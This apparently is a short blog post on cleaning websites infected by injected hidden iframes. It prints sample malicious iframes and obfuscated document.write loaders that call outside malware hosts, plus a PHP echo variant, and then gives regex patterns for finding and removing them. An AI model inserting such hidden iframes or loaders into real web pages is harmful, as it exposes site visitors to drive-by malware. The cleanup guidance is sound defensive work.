This is the iframe villain:
<iframe src=”http://u19.in:8080/ts/in.cgi?pepsi108″ width=125 height=125 style=”visibility: hidden”></iframe>
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe name=c10 src='http://gogo2me .net/.xx/xxxxx.html'
width=461 height=215 style='visibility:hidden'></iframe>
<iframe style="position: absolute; top: 10; left: 124; width: 546px;
height: 524px; visibility: hidden" frameborder="0" scrolling="no"
src="http://94 .247 .2 .157/.xxx/xx.php?sid=1"></iframe>
<script>document.write(“<KRiK&fK%r&%a%#m#&eK& KRnK%a%#m#&e#%=RK\’&&9#Kd#K1KK0%%e%%9R#eRRa&%\’%% %Rs&&rKRcK&=RK\’%KhRRtR%t%RpR&:&#/R&/%Ka##d%%d%%.&KtK#r##a&Kf&Ko##mR&aR#n##.K%cKRn%#/#&a&%d%K/R%i%KnK#d&Ke%%xR&.KRp#Rh%%p%&\’%& R%w%Ki&#dR#t#%h%#=KK2%K6##4R% %&hK&e#Ki#Kg#%h%KtR%=&%5K%3R%5&K %#sK&tK%yR&l#Ke#R=R&\’R&d##iR#sK&p#&l&#a%KyKK:KKn& Ro&&n&%eKR\’#K>KR<%K/R&i&#fK&rRRa##mKKeRR>&#”.replace(/[#%&KR]/g, ”));</script><iframe src=”http://merrychristmasdude.com/ind.php” width=”1″ height=”1″ alt=”Uw8bLlKjsi3HqXs”></iframe>
<script>document.write(“<F?iK_fK_rAFa??mAAeA_ AKnKFaF_m__e?F=FK\’FA2FK1AF5?F3_K3F?9F?aKA6A_fFA\’ FK _Ks_Ar?Fc__=_K\’_Kh_KtA_t?Fp?K:F_/KK/KKaKFd?_d?F._?tKFrF?aKAfK?oA?m?FaAKn?A.AAc?KnAF/__aK?d_?/FAiA_n??d_Ke_FxFF.KKp_Fh?FpAA\’F_ AFwAFiAKd_AtFKhFF=KA7?F8A?1?? KKhF?eK?iAFg?_hA?tFF=?A7AF9_K A?sK_tK_yFKlK?eKF=_A\’__dFFi?FsFKpFKlKKaKFyAA:K?nK Ko_Kn__eAF\’FA>K_<AK/A_i?Af??rAAa??m_Ke_A>?A”.replace(/[AFK\?_]/g, ”));</script><iframe src=”http://merrychristmasdude.com/ind.php” width=”1″ height=”1″ alt=”Uw8bLlKjsi3HqXs”></iframe>
What is <IFRAME>?
The <iframe> tag defines an inline frame that contains another document. We use <iframe> tag to include another document in inside website document.
For example, I use the following iframe code to insert Salesforce.com content syndicate inside my website. Please refer to the image below.
<iframe id=”blockrandom”
name=”iframe” src=”http://probyte2u.com/salesforce.html”
width=”100%”
height=”1300″
scrolling=”auto”
align=”top”
frameborder=”0″
>
This option will not work correctly. Unfortunately, your browser does not support inline frames.
</iframe>
PHP:
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
How do I clean infected files?
Use these regular expressions to search for all pages containig the malicious code and replace it with space:
<iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;
You may have to write a script to automate this for all the files in the server.
Republished by Blog Post Promoter
0 Responses
Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.